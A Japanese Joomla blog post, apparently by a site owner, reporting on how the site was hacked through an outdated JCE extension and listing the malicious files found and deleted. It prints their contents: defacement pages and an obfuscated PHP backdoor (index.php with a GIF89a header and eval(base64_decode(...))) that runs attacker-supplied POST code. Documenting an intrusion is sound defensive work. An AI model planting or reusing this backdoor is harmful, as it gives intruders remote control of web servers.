Joomla 写風

  • フォントサイズを大きくする
  • デフォルトフォントサイズ
  • フォントサイズを小さく
Home hacked by Hmei7-その3

hacked by Hmei7-その3

Eメール 印刷 PDF

【hacked by Hmei7 緊急報告-その3】

とりあえず現在の「ICE の バージョンによって脆弱性が存在するのでこれを利用してサーバーを荒らされるようであることが分かった。
ちなみに私が使っていたのはJCE 1.5.7.4 であったので脆弱性の対象になる。バージョンはJCE 231 以上のバージョンに更新する必要があるとのこと。
また、さくらからの連絡で IE のJAVA スクリプトを無効にするように連絡があったので 2/24 より IE のインターネットオプションからセキュリティの「レベルのカスタマイズ」からJAVA スクリプトを無効にした。また、念のためコンピュータへのリモート アシスタンス接続を無効にしておいた。
サーバーのデータベースはプログラム用のもので個人情報などのデータベースはない等しい。このデータベースには目立った変化はない。また、ここの以下で述べている不審なファイルは今のところ新たに発生していない。

JCEのファイルは次のファイルに置き換えた。
●com_jce_231.zip  ●plg_jcemediabox_116_joomla15.zipを

なお、異常なファイルは joomla に多く出来ていたが以下にこれまで述べてきた以外に見つかったファイルも含めてまとめてみました。

● ・・・・・ファイルは一回目で見つけたファイルを示します
●● ・・・・ファイルは二回目以降で見つけたファイルを示します

ルートサーバー/●x.txt(2/17発見削除)
ルートサーバー/www/●z.txt(2/19発見削除)
ルートサーバー/www/tmp/●●z.txt(2/24発見削除)
ルートサーバー/www/bigdump/●mail.php.sql(2/18発見削除)
(スキャンにて Troja-Mailfinder.PHP.Massmabh として駆除される)
ルートサーバー/www/bigdump/●o.php.sql(2/18発見削除)
(スキャンにて Troja-Mailfinder.PHP.Massmabh として駆除される)
ルートサーバー/www/bigdump/●sql.php.sql(2/18発見削除)

-----------------------------------------------------------------------------

ルートサーバー/www/joomla/●●gh.html(2/22発見削除)
ルートサーバー/www/joomla/●●z.txt(2/22発見削除)

------------------------------------------------------------------------------

ルートサーバー/www/joomla/logs/●●gh.html(2/22発見削除)
ルートサーバー/www/joomla/logs/●●z.txt(2/22発見削除)

------------------------------------------------------------------------------

ルートサーバー/www/joomla/temp/●●gh.html(2/22発見削除)   ***
ルートサーバー/www/joomla/temp/●●z.txt(2/22発見削除)     ***
ルートサーバー/www/joomla/temp/●●lndex.php(2/22発見削除) ***

------------------------------------------------------------------------------

ルートサーバー/www/joomla/plugins/usr/●.tool/●404.php(2/19発見削除)
ルートサーバー/www/joomla/plugins/usr/●.tool/●a.php(2/19発見削除)
ルートサーバー/www/joomla/plugins/usr/●.tool/●b.php(2/19発見削除)
ルートサーバー/www/joomla/plugins/usr/●.tool/●c.php(2/19発見削除)
ルートサーバー/www/joomla/plugins/usr/●.tool/●d.php(2/19発見削除)
ルートサーバー/www/joomla/plugins/usr/●.tool/●e.php(2/19発見削除)
ルートサーバー/www/joomla/plugins/usr/●.tool/●f.php(2/19発見削除)
ルートサーバー/www/joomla/plugins/usr/●.tool/●g.php(2/19発見削除)
ルートサーバー/www/joomla/plugins/usr/●.tool/●h.php(2/19発見削除)

----------------------------------------------------------------------------------------------------------

ルートサーバー/www/joomla/administrator/modules/mod_unread/●●lv.php(2/25発見削除)

----------------------------------------------------------------------------------------------------------

*** 部のディレクトリで出た gh.html のファイルを削除前に実行したところ以下の表示がされた。
  他で発見されたの gh.html ファイルも同様に表示されると思われる。

アルジェリア人のハッカーであることを宣言しているようである。

130224-PICT0001

なおファイルの中の内容を以下に示しておきます。

【x.txt】

hacked by Hmei7

【z.txt】

hacked by s13doeL

【index.php】

GIF89a1
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydjb20nXSkgJiYgbWQ1KCRfUE9TVFsnY29tJ10pID09ICdjZTNmNTdjND
JlMzQ3NWQyYWIxNjQ2NTg3YTMxZTg0ZScgJiYgaXNzZXQoJF9QT1NUWydjb250ZW50J10pKSAka2sgP
SBzdHJ0cigkX1BPU1RbJ2NvbnRlbnQnXSwgJy1fLCcsICcrLz0nKTtldmFsKGJhc2U2NF9kZWNvZGUoJ
GtrKSk7'));echo('abrval');?>

【gh.html】

 <html>
<head>
<meta http-equiv="Content-Language" content="fr">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Hacked by ghost-dz</title>
</head>
<body bgcolor="#000000">
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font size="8" color="#FFFFFF">Hacked by ghost-dz</font></p>
<p align="center"><font size="8" color="#FF0000">Algerian Hacker</font></p>
</body>
</html>

【404.php】及び 【a.php(h.php まで同じもの)】の内容は

hacked by Hmei7-その2 を参照下さい。

最終更新 2013年 10月 22日(火曜日) 23:37  
Home hacked by Hmei7-その3

写風お勧め Extemtion

秋づいた美山町

  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow

Movies

アンケート

Joomla!を何に利用しますか?
 

オンライン中のユーザー

現在
 ゲスト 116 人
 がオンラインです

ニュース速報

Joomla!はどんな種類のウェブサイトでも簡単に構築できます。あなたがパンフレットサイトを望んでいたり、あるいは大規模なオンラインコミュニティを構築中であったりするにせよ、Joomla!は数分間で新しいサイトを設置し、必要とする特別な機能を追加することができます。何百もの入手可能なエクステンションが、あなたのサイトを拡張し、あなたがインターネットへ伸ばす手をより広げてくれる新しいサービスを届ける助けとなるでしょう